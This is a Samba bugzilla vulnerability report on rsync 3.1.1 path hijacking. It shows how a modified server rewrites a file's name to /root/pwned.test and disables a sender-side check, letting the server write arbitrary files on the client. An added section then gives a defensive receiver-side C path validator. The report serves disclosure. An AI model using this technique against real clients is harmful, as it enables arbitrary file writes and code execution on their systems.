[Bug 10936] New: Rsync path hijacking attack vulnerability
samba-bugs at samba.org
Thu Nov 13 23:51:40 MST 2014
https://bugzilla.samba.org/show_bug.cgi?id=10936
Bug ID: 10936
Summary: Rsync path hijacking attack vulnerability
Product: rsync
Version: 3.1.1
Hardware: All
OS: All
Status: NEW
Severity: critical
Priority: P5
Component: core
Assignee: wayned at samba.org
Reporter: gaojianfeng at baidu.com
QA Contact: rsync-qa at samba.org
Created attachment 10433
--> https://bugzilla.samba.org/attachment.cgi?id=10433&action=edit
Rsync path hijacking attack vulnerability.pdf (Detailed documentation)
Hi all:
In the newest version of rsync, Baidu Security Team found a vulnerability which is
similar to the wget FTP CVE-2014-4877
(http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4877). When a
client uses parameter -a to synchronize files from the server side (default), for
example:
rsync -avzP 127.0.0.1::share /tmp/share
rsync recursively synchronizes all files. An attacker can hijack the file path by
modifying the code of the server side, which allows remote servers to write to
arbitrary files, and consequently execute arbitrary code.
Vulnerability details:
First I wrote the following files into the shared rsync folder:
[root at pentest rsync]# ls -lh
total 8.0K
-rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt
drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir
[root at pentest rsync]# cd truedir/
[root at pentest truedir]# ls
pwned
[root at pentest truedir]# cat pwned
rsync test
[root at pentest truedir]#
Next I modified the server's file-sending code; in the process of
synchronizing, the path of the file
"pwned" can be intercepted and changed to any path.
file: flist.c line:394
static void send_file_entry(int f, const char *fname, struct file_struct *file,
#ifdef SUPPORT_LINKS
                            const char *symlink_name, int symlink_len,
#endif
                            int ndx, int first_ndx)
{
    /* malicious sender: rewrite the name of the shared file before it is sent */
    if (strcmp(fname, "truedir/pwned") == 0) {
        fname = "/root/pwned.test"; /* arbitrary path chosen by the attacker */
    }
Then, verification occurs on the server side and says "received request to
transfer non-regular file:
/root/pwned.test 7 [sender]". But as an attacker, the code of the server side
can be arbitrarily
controlled, so the following code is commented out:
file: rsync.c line:405
/*
    if (iflags & ITEM_TRANSFER) {
        int i = ndx - cur_flist->ndx_start;
        if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
            rprintf(FERROR,
                "received request to transfer non-regular file: %d [%s]\n",
                ndx, who_am_i());
            exit_cleanup(RERR_PROTOCOL);
        }
    }
*/
The file "pwned" will be downloaded into the forged path (/root/pwned.test).
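The check the report disables in rsync.c runs on the sender, which is exactly the side the attacker controls, so it cannot protect the client: any validation of names in the received file list has to happen on the receiver, before a destination path is formed. The following is an added example of such a receiver-side check, written for this page and not taken from rsync; the function names, the constructed sample file list and the destination directory /tmp/share are assumptions for illustration. It rejects absolute names and names containing a ".." component, so the forged entry from the report (/root/pwned.test) is refused while the honest entries are kept.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical receiver-side check (added example, not rsync's own code):
 * a name taken from an untrusted sender's file list is accepted only if it
 * is relative and contains no ".." component, so the resulting path cannot
 * escape the destination directory. */
bool dest_name_is_safe(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return false;              /* empty name: nothing sensible to write */
    if (name[0] == '/')
        return false;              /* absolute, e.g. /root/pwned.test */
    const char *p = name;
    while (*p) {
        const char *seg = p;
        while (*p && *p != '/')
            p++;
        size_t len = (size_t)(p - seg);
        if (len == 2 && seg[0] == '.' && seg[1] == '.')
            return false;          /* "..", e.g. truedir/../../root/x */
        if (*p == '/')
            p++;
    }
    return true;
}

/* Build the on-disk target the receiver would write to. Returns false and
 * leaves out[] empty when the sender's name is rejected or does not fit. */
bool resolve_dest(const char *dest_dir, const char *name, char *out, size_t outlen)
{
    out[0] = '\0';
    if (!dest_name_is_safe(name))
        return false;
    int n = snprintf(out, outlen, "%s/%s", dest_dir, name);
    return n > 0 && (size_t)n < outlen;
}

/* Constructed sample file list (assumption, for illustration): the entries
 * an honest sender emits for the share in the report, followed by forged
 * entries a modified send_file_entry() could emit. */
static const char *sample_names[] = {
    "1.txt",
    "truedir",
    "truedir/pwned",
    "/root/pwned.test",
    "truedir/../../root/pwned.test",
    "..",
    "",
};

/* Number of sample names that survive the check (3 of the 7 above). */
int count_accepted(void)
{
    int accepted = 0;
    size_t n = sizeof(sample_names) / sizeof(sample_names[0]);
    for (size_t i = 0; i < n; i++)
        if (dest_name_is_safe(sample_names[i]))
            accepted++;
    return accepted;
}

int main(void)
{
    char path[256];
    size_t n = sizeof(sample_names) / sizeof(sample_names[0]);
    for (size_t i = 0; i < n; i++) {
        const char *name = sample_names[i];
        if (resolve_dest("/tmp/share", name, path, sizeof path))
            printf("accept  %-32s -> %s\n", name, path);
        else
            printf("reject  %-32s\n", name);
    }
    printf("%d of %zu names accepted\n", count_accepted(), n);
    return 0;
}
```

A lexical check like this is the minimum: it does not cover a sender that first ships a symlink pointing outside the destination and then a file through it, which is a separate problem handled by rsync's own symlink options (for example --safe-links) and by not following sender-supplied links when creating files.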